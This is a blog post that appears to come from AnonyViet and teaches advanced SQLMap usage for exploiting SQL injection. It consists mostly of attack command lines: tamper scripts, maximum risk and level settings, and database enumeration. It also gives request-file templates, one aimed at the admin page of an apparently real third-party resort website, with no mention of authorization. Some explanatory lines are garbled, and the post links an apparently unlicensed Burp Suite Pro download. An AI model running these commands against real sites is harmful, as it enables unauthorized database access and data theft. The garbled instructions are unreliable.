• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result
Home Security

How to use advanced SQLMap

AnonyViet by AnonyViet
May 1, 2023
in Security
0
0
SHARES
Share on FacebookShare on Twitter

SQLMap is a software that helps to exploit SQL Injection automatically, saving you more time than manual mining. I have instructions on how use basic SQLMap, however SQLMap still has advanced parameters to help you save mining time and increase mining efficiency. Here are some advanced SQLMap usage techniques for you to exploit SQL Injection errors.

Join the channel Telegram belong to AnonyViet ???? Link ????

How to use advanced SQLMap

I will briefly talk about how to install and use SQLMap first:

Seh dmoundng --batch Deh? SQLMap runs automatically and skips yes/no questions

Seh dmoundng *Determine the injection location

Seh dmoundng --string="String_in_the_response" Dto know which string has been successfully injected (True)


sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"

sqlmap -r request.txt

sqlmap -m urls.txt

sqlmap -u "http://afine.com/user/*" -H "User-agent: *"

sqlmap -r request.txt --second-order "http://afine.com/avatar"


--random-agent

--batch

--risk=3 --level=5


--proxy=http://127.0.0.1:8080

-v 0
-v 4

--output-dir=sqlmap

--prefix "this_string_must_be_before_injection"

--suffix "--this_string_must_be_at_the_end_of_injection"

sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'

--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"

-H "Auth_header: secret1" -H "Cookie: auth2=secret2"

python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch

Request form POST: Inject into Username, then enter * in username=

POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1

Save the file as request.txt and put it in the sqlmap folder

Request form GET:

GET /admin/index.php?option=tin-sua&tin_id=1
Host: phanthiet.terracottaresort.com

Save the file as request.txt and put it in the sqlmap folder

Use Burp Suite Pro Extension

Download Burp Suite Pro here

  • Request Timer – Capture timed response packets (suitable for blind sql injection).

Request Timer burp suite

  • Burp Bounty Pro: automatically search for security holes with Burp Suite Pro (if you need this extension, comment below, I will send it separately)

Burp Bounty Pro

sqlmap burp suite

SQLiPy Sqlmap Integration bup suite

Any SQLI found by SQLiPy will be added Results tab by Burp Suite.

Payload SQL Injection

Summary of Payloads to test SQL Injection is here: PayloadsAllTheThings.

SQLMap CheatSheel download here: https://github.com/anonyvietofficial/sqlmap-cheatsheet

Rate this post

Tags: AdvancedSQLMap
Previous Post

[Facebook] Code Add Members For Group !

Next Post

[Facebook] Code Accept friend request

AnonyViet

AnonyViet

Related Posts

How to use Hydra to attack Brute Force
Security

How to use Hydra to attack Brute Force

November 17, 2023
PyPhisher: Easy-to-use phishing tool with 65 available sites
Security

PyPhisher: Easy-to-use phishing tool with 65 available sites

November 15, 2023
Careful!  Keystroke sounds can reveal passwords to hackers
Security

Careful! Keystroke sounds can reveal passwords to hackers

October 6, 2023
SQL Injection Payload List
Security

SQL Injection Payload List

September 9, 2023
Exploiting XSS with Javascript/JPEG Polyglot
Security

Exploiting XSS with Javascript/JPEG Polyglot

September 8, 2023
AnvRS – Reverse Shell Bypass Antivirus Tool
Security

AnvRS – Reverse Shell Bypass Antivirus Tool

August 29, 2023
Next Post
[Facebook] Code Accept friend request

[Facebook] Code Accept friend request

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent News

How to put AI Copilot in the system tray on Windows 11

How to put AI Copilot in the system tray on Windows 11

November 29, 2023
Things to keep in mind when looking for office space for rent in District 2

Things to keep in mind when looking for office space for rent in District 2

November 29, 2023
What is Data Migration?  Learn about the best data migration tools today

What is Data Migration? Learn about the best data migration tools today

November 29, 2023
cache – AnonyViet

cache – AnonyViet

November 29, 2023
How to put AI Copilot in the system tray on Windows 11

How to put AI Copilot in the system tray on Windows 11

November 29, 2023
Things to keep in mind when looking for office space for rent in District 2

Things to keep in mind when looking for office space for rent in District 2

November 29, 2023
What is Data Migration?  Learn about the best data migration tools today

What is Data Migration? Learn about the best data migration tools today

November 29, 2023
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to put AI Copilot in the system tray on Windows 11

How to put AI Copilot in the system tray on Windows 11

November 29, 2023
Things to keep in mind when looking for office space for rent in District 2

Things to keep in mind when looking for office space for rent in District 2

November 29, 2023
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

© 2023 JNews - Premium WordPress news & magazine theme by Jegtheme.